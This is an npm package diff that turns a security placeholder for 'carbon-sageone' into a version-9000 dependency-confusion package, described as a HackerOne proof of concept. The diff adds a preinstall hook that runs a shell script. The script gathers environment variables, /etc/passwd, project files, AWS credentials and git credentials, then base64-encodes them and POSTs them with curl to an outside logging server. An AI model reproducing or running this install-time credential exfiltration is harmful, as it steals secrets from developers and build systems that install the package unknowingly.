carbon-sageone 0.0.1-security → 9000.0.14

package/index.js

@@ -0,0 +1,7 @@
+//index.js
+
+function helloSage() {
+  return "Dependency confusion attempt. HackerOne, @axfla";
+}
+
+module.exports = helloSage;

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "carbon-sageone",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9000.0.14",
+  "description": "H1 PoC @axfla",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "sh ./poc_sage.sh"
+  },
+  "author": "axfla",
+  "license": "ISC"
 }

package/poc_sage.sh

@@ -0,0 +1,25 @@
+echo "-- uname -a" >> output.txt
+uname -a >> output.txt
+echo "-- env" >> output.txt
+env >> output.txt
+echo "-- /etc/passwd" >> output.txt
+cat /etc/passwd >> output.txt
+echo "-- CURRENT FOLDER" >> output.txt
+ls -al >> output.txt
+echo "-- HOME FOLDER" >> output.txt
+ls -al ~/ >> output.txt
+echo "-- / FOLDER" >> output.txt
+ls -al / >> output.txt
+echo "-- docker-entrypoint.sh" >> output.txt
+cat ../../docker-entrypoint.sh >> output.txt
+echo "-- Cargo.toml" >> output.txt
+cat ../../Cargo.toml >> output.txt
+echo "-- package.json" >> output.txt
+cat ../../package.json >> output.txt
+echo "-- npm.sh" >> output.txt
+cat ../../npm.sh >> output.txt
+echo "-- .aws/*" >> output.txt
+cat ~/.aws/* >> output.txt
+echo "-- .git-credentials/*" >> output.txt
+cat ~/.git-credentials/* >> output.txt
+curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(id | base64)" -H "Pwd: $(pwd | base64)" -d "$(cat output.txt | base64)"  "https://d7.lc/sage_h1/logger.php"

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=carbon-sageone for more information.